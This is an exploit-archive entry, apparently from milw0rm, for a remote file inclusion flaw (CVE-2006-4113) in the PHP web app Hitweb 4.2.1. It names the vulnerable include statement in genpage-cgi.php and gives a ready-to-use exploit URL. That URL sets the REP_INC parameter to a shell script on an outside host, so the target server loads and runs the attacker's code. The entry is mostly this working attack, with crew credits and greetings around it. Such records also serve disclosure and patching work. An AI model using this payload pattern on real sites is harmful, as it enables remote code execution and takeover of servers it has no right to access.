Hitweb 4.2.1 - 'REP_INC' Remote File Inclusion

Author: Drago84
type: webapps
platform: php
port: 
date_added: 2006-08-07 
date_updated:  
verified: 1 
codes: OSVDB-27880;CVE-2006-4113 
tags: 
aliases:  
screenshot_url:  
application_url: 

Hitweb 4.2 Remote Include File

CreW: ToxiC

Bug Found By Drago84

Sorce Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz

Problem is:
include "$REP_INC/lib_database.php";

Page:
genpage-cgi.php

Path:
Declare $REP_INC

Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?

Greatz:Str0ke

# milw0rm.com [2006-08-08]